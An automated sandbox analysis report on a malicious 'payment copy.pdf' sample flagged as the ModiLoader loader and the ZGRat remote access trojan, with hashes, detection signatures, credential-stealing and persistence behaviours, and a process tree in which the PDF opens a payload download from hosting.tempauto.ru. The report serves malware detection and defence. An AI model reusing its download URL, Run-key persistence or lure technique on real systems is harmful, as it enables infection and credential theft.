modiloader | 461808a3c8fb7ec9950a8b7d69343244b8363a8b06e553141f7a14d6cdf75ee6

Analysis

max time kernel
140s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
14-05-2024 13:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

payment copy.pdf
Size

76KB
MD5

ac3a8f618810c3680ce24a24252b5252
SHA1

658126c5d9a6a7424861c2aee07816ae5498c8c1
SHA256

77948e428ad7708bb79e23ec0dd199b4d25bed6c58813b1297eed1cd03251960
SHA512

d56a2b6678c88ee311b4189f1811ba14df22c5e536f89f253eaac570113a405057ec7005fc1fad087b01b056a59791693b5a18ecd2f3f24db181c839cf1b791d
SSDEEP

1536:yRNRvcJqzv+kafzNQDo8c2hlneYPJMpCJEM1qatanErV6Q7MyNCbbi1XEk:yRkJq5+J8zneQJMpCOZataExMyY3QXL

Score

10^/10

modiloader zgrat persistence rat spyware stealer trojan

Malware Config

Signatures

Detect ZGRat V1 33 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1096-282-0x00000000402E0000-0x000000004033E000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-284-0x00000000403E0000-0x000000004043E000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-330-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-308-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-342-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-341-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-338-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-336-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-335-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-332-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-328-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-327-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-324-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-322-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-321-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-318-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-316-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-315-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-312-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-311-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-306-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-305-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-302-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-298-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-296-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-294-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-344-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-300-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-292-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-290-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-288-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-286-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1
behavioral2/memory/1096-285-0x00000000403E0000-0x0000000040437000-memory.dmp	family_zgrat_v1

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

ModiLoader Second Stage 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1096-277-0x0000000000400000-0x0000000001400000-memory.dmp	modiloader_stage2
behavioral2/memory/1096-280-0x0000000000400000-0x0000000001400000-memory.dmp	modiloader_stage2

Executes dropped EXE 2 IoCs

Processes:

Adobe.exedwewgsuF.pif

pid process

4572 Adobe.exe
1096 dwewgsuF.pif
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
4572	Adobe.exe
1096	dwewgsuF.pif

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Adobe.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Fusgwewd = "C:\\Users\\Public\\Fusgwewd.url"	Adobe.exe

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

89 api.ipify.org
90 ip-api.com
88 api.ipify.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

Adobe.exe

description pid process target process

PID 4572 set thread context of 1096 4572 Adobe.exe dwewgsuF.pif

flow	ioc
89	api.ipify.org
90	ip-api.com
88	api.ipify.org

description	pid	process	target process
PID 4572 set thread context of 1096	4572	Adobe.exe	dwewgsuF.pif

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings msedge.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 85 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings	msedge.exe

description	flow	ioc
HTTP User-Agent header	85	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 37 IoCs

Processes:

AcroRd32.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exedwewgsuF.pifmsedge.exe

pid	process
944	AcroRd32.exe
944	AcroRd32.exe
944	AcroRd32.exe
944	AcroRd32.exe
944	AcroRd32.exe
944	AcroRd32.exe
944	AcroRd32.exe
944	AcroRd32.exe
944	AcroRd32.exe
944	AcroRd32.exe
944	AcroRd32.exe
944	AcroRd32.exe
944	AcroRd32.exe
944	AcroRd32.exe
944	AcroRd32.exe
944	AcroRd32.exe
944	AcroRd32.exe
944	AcroRd32.exe
944	AcroRd32.exe
944	AcroRd32.exe
3896	msedge.exe
3896	msedge.exe
2404	msedge.exe
2404	msedge.exe
1820	identity_helper.exe
1820	identity_helper.exe
3588	msedge.exe
3588	msedge.exe
5356	msedge.exe
5356	msedge.exe
1096	dwewgsuF.pif
1096	dwewgsuF.pif
1096	dwewgsuF.pif
3132	msedge.exe
3132	msedge.exe
3132	msedge.exe
3132	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

Processes:

msedge.exe

pid process

2404 msedge.exe
2404 msedge.exe
2404 msedge.exe
2404 msedge.exe
2404 msedge.exe
2404 msedge.exe
2404 msedge.exe
2404 msedge.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

7zG.exedwewgsuF.pif

description	pid	process
Token: SeRestorePrivilege	636	7zG.exe
Token: 35	636	7zG.exe
Token: SeSecurityPrivilege	636	7zG.exe
Token: SeSecurityPrivilege	636	7zG.exe
Token: SeDebugPrivilege	1096	dwewgsuF.pif

Suspicious use of FindShellTrayWindow 43 IoCs

Processes:

msedge.exeAcroRd32.exe7zG.exe

pid	process
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
944	AcroRd32.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
636	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe
2404	msedge.exe

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

AcroRd32.exedwewgsuF.pif

pid process

944 AcroRd32.exe
944 AcroRd32.exe
944 AcroRd32.exe
944 AcroRd32.exe
944 AcroRd32.exe
944 AcroRd32.exe
1096 dwewgsuF.pif

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

AcroRd32.exemsedge.exe

description	pid	process	target process
PID 944 wrote to memory of 2404	944	AcroRd32.exe	msedge.exe
PID 944 wrote to memory of 2404	944	AcroRd32.exe	msedge.exe
PID 2404 wrote to memory of 1824	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 1824	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4976	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 3896	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 3896	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4940	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4940	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4940	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4940	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4940	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4940	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4940	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4940	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4940	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4940	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4940	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4940	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4940	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4940	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4940	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4940	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4940	2404	msedge.exe	msedge.exe
PID 2404 wrote to memory of 4940	2404	msedge.exe	msedge.exe

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\payment copy.pdf"
1⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://hosting.tempauto.ru/Adobe.rar
  2⤵
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2404
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff931a46f8,0x7fff931a4708,0x7fff931a4718
    3⤵
    PID:1824
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,7002417329987499245,4452690705573151580,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
    3⤵
    PID:4976
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,7002417329987499245,4452690705573151580,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3896
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,7002417329987499245,4452690705573151580,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2948 /prefetch:8
    3⤵
    PID:4940
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7002417329987499245,4452690705573151580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
    3⤵
    PID:2876
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7002417329987499245,4452690705573151580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
    3⤵
    PID:3948
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,7002417329987499245,4452690705573151580,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5352 /prefetch:8
    3⤵
    PID:1040
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,7002417329987499245,4452690705573151580,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5352 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1820
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7002417329987499245,4452690705573151580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
    3⤵
    PID:2228
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7002417329987499245,4452690705573151580,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
    3⤵
    PID:3884
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,7002417329987499245,4452690705573151580,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3460 /prefetch:8
    3⤵
    PID:636
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7002417329987499245,4452690705573151580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4228 /prefetch:1
    3⤵
    PID:1044
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,7002417329987499245,4452690705573151580,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5936 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3588
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7002417329987499245,4452690705573151580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
    3⤵
    PID:3640
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7002417329987499245,4452690705573151580,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
    3⤵
    PID:4200
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7002417329987499245,4452690705573151580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
    3⤵
    PID:1728
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,7002417329987499245,4452690705573151580,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5356
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,7002417329987499245,4452690705573151580,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4748 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3132
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
  2⤵
  PID:5456
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E96BCB74AEF3EB0DE17D74CC9F44EFE2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    3⤵
    PID:5604
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=AD1FE57EFA9F83CCBBC0759CAE618700 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,35